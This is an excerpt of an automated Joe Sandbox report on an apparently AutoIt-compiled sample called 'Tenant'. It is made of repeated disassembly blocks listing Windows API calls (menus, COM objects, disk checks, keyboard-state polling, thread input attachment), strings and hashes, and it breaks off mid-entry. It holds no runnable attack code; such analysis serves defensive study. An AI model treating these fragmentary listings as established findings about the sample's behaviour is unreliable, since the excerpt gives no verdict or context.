                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        APIs
                                                                                          • Part of subcall function 00AA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2412,?,00000000,?,?,?,?,00AA1AA7,00000000,?), ref: 00AA1F76
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA24AF
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00AA254A
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00ADBFE7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC018
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC02F
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC04B
                                                                                        • DeleteObject.GDI32(00000000), ref: 00ADC05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
                                                                                        • GetSysColor.USER32(0000000F), ref: 00AA25AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AB2A3E,?,00008000), ref: 00AC0BA7
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AB2ADF
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2C2C
                                                                                          • Part of subcall function 00AB3EBE: _wcscpy.LIBCMT ref: 00AB3EF6
                                                                                          • Part of subcall function 00AC386D: _iswctype.LIBCMT ref: 00AC3875
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 537147316-3738523708
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,00B30980), ref: 00B0AF4E
                                                                                        • GetDriveTypeW.KERNEL32(00000061,00B5B5F0,00000061), ref: 00B0B018
                                                                                        • _wcscpy.LIBCMT ref: 00B0B042
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B2778F
                                                                                        • CreateMenu.USER32 ref: 00B277AA
                                                                                        • SetMenu.USER32(?,00000000), ref: 00B277B9
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27846
                                                                                        • IsMenu.USER32(?), ref: 00B2785C
                                                                                        • CreatePopupMenu.USER32 ref: 00B27866
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B27893
                                                                                        • DrawMenuBar.USER32 ref: 00B2789B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B27B83
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B27B8A
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B27B9D
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B27BA5
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B27BB0
                                                                                        • DeleteDC.GDI32(00000000), ref: 00B27BB9
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00B27BC3
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B27BD7
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B27BE3
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AC706B
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC7104
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC713A
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC7157
                                                                                        • __allrem.LIBCMT ref: 00AC71AD
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71C9
                                                                                        • __allrem.LIBCMT ref: 00AC71E0
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71FE
                                                                                        • __allrem.LIBCMT ref: 00AC7215
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7233
                                                                                        • __invoke_watson.LIBCMT ref: 00AC72A4
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B02CE9
                                                                                        • GetMenuItemInfoW.USER32(00B67890,000000FF,00000000,00000030), ref: 00B02D4A
                                                                                        • SetMenuItemInfoW.USER32(00B67890,00000004,00000000,00000030), ref: 00B02D80
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B02D92
                                                                                        • GetMenuItemCount.USER32(?), ref: 00B02DD6
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00B02DF2
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00B02E1C
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00B02E61
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02EA7
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02EBB
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02EDC
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B275CA
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B275CD
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B275F1
                                                                                        • _memset.LIBCMT ref: 00B27602
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B27614
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B2768C
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AF77DD
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00AF7836
                                                                                        • VariantInit.OLEAUT32(?), ref: 00AF7848
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AF7868
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00AF78BB
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AF78CF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AF78E4
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00AF78F1
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF78FA
                                                                                        • VariantClear.OLEAUT32(?), ref: 00AF790C
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AF7917
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 13392543fe4b46982bc052c4eeff51a8b663bbdbdc0890eef66068fc7be6790b
                                                                                        • Instruction ID: 6da146bce52d63b0b8d32c6538781a8054ec6cb0695d4833ed1c28bf98d5b6a5
                                                                                        • Opcode Fuzzy Hash: 13392543fe4b46982bc052c4eeff51a8b663bbdbdc0890eef66068fc7be6790b
                                                                                        • Instruction Fuzzy Hash: 44415435A0411D9FCB04EFA4D8989EDBBB9FF48354F108069FA55A7361CB70AA45CF90
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00B00530
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B005B1
                                                                                        • GetKeyState.USER32(000000A0), ref: 00B005CC
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B005E6
                                                                                        • GetKeyState.USER32(000000A1), ref: 00B005FB
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B00613
                                                                                        • GetKeyState.USER32(00000011), ref: 00B00625
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B0063D
                                                                                        • GetKeyState.USER32(00000012), ref: 00B0064F
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B00667
                                                                                        • GetKeyState.USER32(0000005B), ref: 00B00679
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: 9472ba164b5ded326bc79a72192bb0b625165dba4ed43bbfc3fdadba6adbc546
                                                                                        • Instruction ID: 48e62d062ea6802302109e8888fb9b80c0916e4dded15678b5423a2422a9745f
                                                                                        • Opcode Fuzzy Hash: 9472ba164b5ded326bc79a72192bb0b625165dba4ed43bbfc3fdadba6adbc546
                                                                                        • Instruction Fuzzy Hash: 3041D6305247CA6DFF30B66488543B9BEE1EF61304F0840DAD9C6475C1EBA599D8CFA2
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • CoInitialize.OLE32 ref: 00B18AED
                                                                                        • CoUninitialize.OLE32 ref: 00B18AF8
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00B33BBC,?), ref: 00B18B58
                                                                                        • IIDFromString.OLE32(?,?), ref: 00B18BCB
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18C65
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18CC6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: b12979946bd8767a69b3ab19981cc023b01d3a0910c6c0d41f3474ff3a7d68cb
                                                                                        • Instruction ID: f5fe28a8b176f2e1b10551f51f8071c714d77c509a4e6536d7cdc52534658303
                                                                                        • Opcode Fuzzy Hash: b12979946bd8767a69b3ab19981cc023b01d3a0910c6c0d41f3474ff3a7d68cb
                                                                                        • Instruction Fuzzy Hash: 27616B702087119FD710DF24C985FAAB7E8FF49714F504889F9859B291DB70ED88CBA6
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0BB13
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B0BB89
                                                                                        • GetLastError.KERNEL32 ref: 00B0BB93
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00B0BC00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: bd0cceb3aaa57581d71be9bac2a2f59dd4423713c56bba79901e81cb43a286c0
                                                                                        • Instruction ID: 3e57c22c87ff81b73673f796a8b0815b7e252952d11a3c7faeedef814cb957b1
                                                                                        • Opcode Fuzzy Hash: bd0cceb3aaa57581d71be9bac2a2f59dd4423713c56bba79901e81cb43a286c0
                                                                                        • Instruction Fuzzy Hash: 8231A135A00209AFCB10EF64C995EAEBBF8EF48300F1480E5E806972E6DB719D05CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AF9BCC
                                                                                        • GetDlgCtrlID.USER32 ref: 00AF9BD7
                                                                                        • GetParent.USER32 ref: 00AF9BF3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9BF6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AF9BFF
                                                                                        • GetParent.USER32(?), ref: 00AF9C1B
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9C1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: a0275a8108d4f7b2a2562d6f9745f65b0ea53d78d7e6573ce056ea6154f354b5
                                                                                        • Instruction ID: 0b523ed061c33d3bd2b6a59eb063a400b78fd62d15c4cc327b9a87ae10f15a0d
                                                                                        • Opcode Fuzzy Hash: a0275a8108d4f7b2a2562d6f9745f65b0ea53d78d7e6573ce056ea6154f354b5
                                                                                        • Instruction Fuzzy Hash: AA21D370900108BFCF04EBA0DC95EFEBBB9EF95310F100155FA61932E6EB7558159B20
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AF9CB5
                                                                                        • GetDlgCtrlID.USER32 ref: 00AF9CC0
                                                                                        • GetParent.USER32 ref: 00AF9CDC
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AF9CDF
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00AF9CE8
                                                                                        • GetParent.USER32(?), ref: 00AF9D04
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AF9D07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1536045017-1403004172
                                                                                        • Opcode ID: 886822c765c6a57c2be95dce353d824e2722abbdb818e0489dd027002bf59cf7
                                                                                        • Instruction ID: c230e5f8110a6ca9301ba7360f433888c24eb6dd3a22fa23be85d0ce5ec0a0dc
                                                                                        • Opcode Fuzzy Hash: 886822c765c6a57c2be95dce353d824e2722abbdb818e0489dd027002bf59cf7
                                                                                        • Instruction Fuzzy Hash: 6B21F571901108BFDF10ABA0CC95FFEBBB9EF95300F200155F951931A6DB755915DB20
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00AF9D27
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00AF9D3C
                                                                                        • _wcscmp.LIBCMT ref: 00AF9D4E
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AF9DC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 09f56591d46e2790e2455236de93a9957e5d810a1a18738196d508e45c69ca0f
                                                                                        • Instruction ID: 96f2fe480e0e12065b1416eb0aa90a17adc093b6c931794d7ced30303e5ca0f3
                                                                                        • Opcode Fuzzy Hash: 09f56591d46e2790e2455236de93a9957e5d810a1a18738196d508e45c69ca0f
                                                                                        • Instruction Fuzzy Hash: 0B11E37724830ABAFA012760EC16FB777ACDF15361B304296FB00A50E1FE666A115951
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18FC1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B18FEE
                                                                                        • CoUninitialize.OLE32 ref: 00B18FF8
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00B190F8
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B19225
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B33BDC), ref: 00B19259
                                                                                        • CoGetObject.OLE32(?,00000000,00B33BDC,?), ref: 00B1927C
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00B1928F
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B1930F
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B1931F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: d9b13530392f057d8bfd335a7660b2234e6a0774e1025ede40704fbeb7ff8f63
                                                                                        • Instruction ID: 7f0bd487b2c7006f1bad703c6384d2f1587bce348c7c580ca5d1f80e485c0832
                                                                                        • Opcode Fuzzy Hash: d9b13530392f057d8bfd335a7660b2234e6a0774e1025ede40704fbeb7ff8f63
                                                                                        • Instruction Fuzzy Hash: 28C16671208345AFC700EF64C89496BB7E9FF89708F50499CF98A9B251DB31ED85CB92
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B019EF
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A03
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00B01A0A
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A19
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B01A2B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A44
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A56
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01A9B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01AB0
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B00A67,?,00000001), ref: 00B01ABB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: af84605448517b377566194098c147198f47e1786c02e9b88c92fbaf78d78292
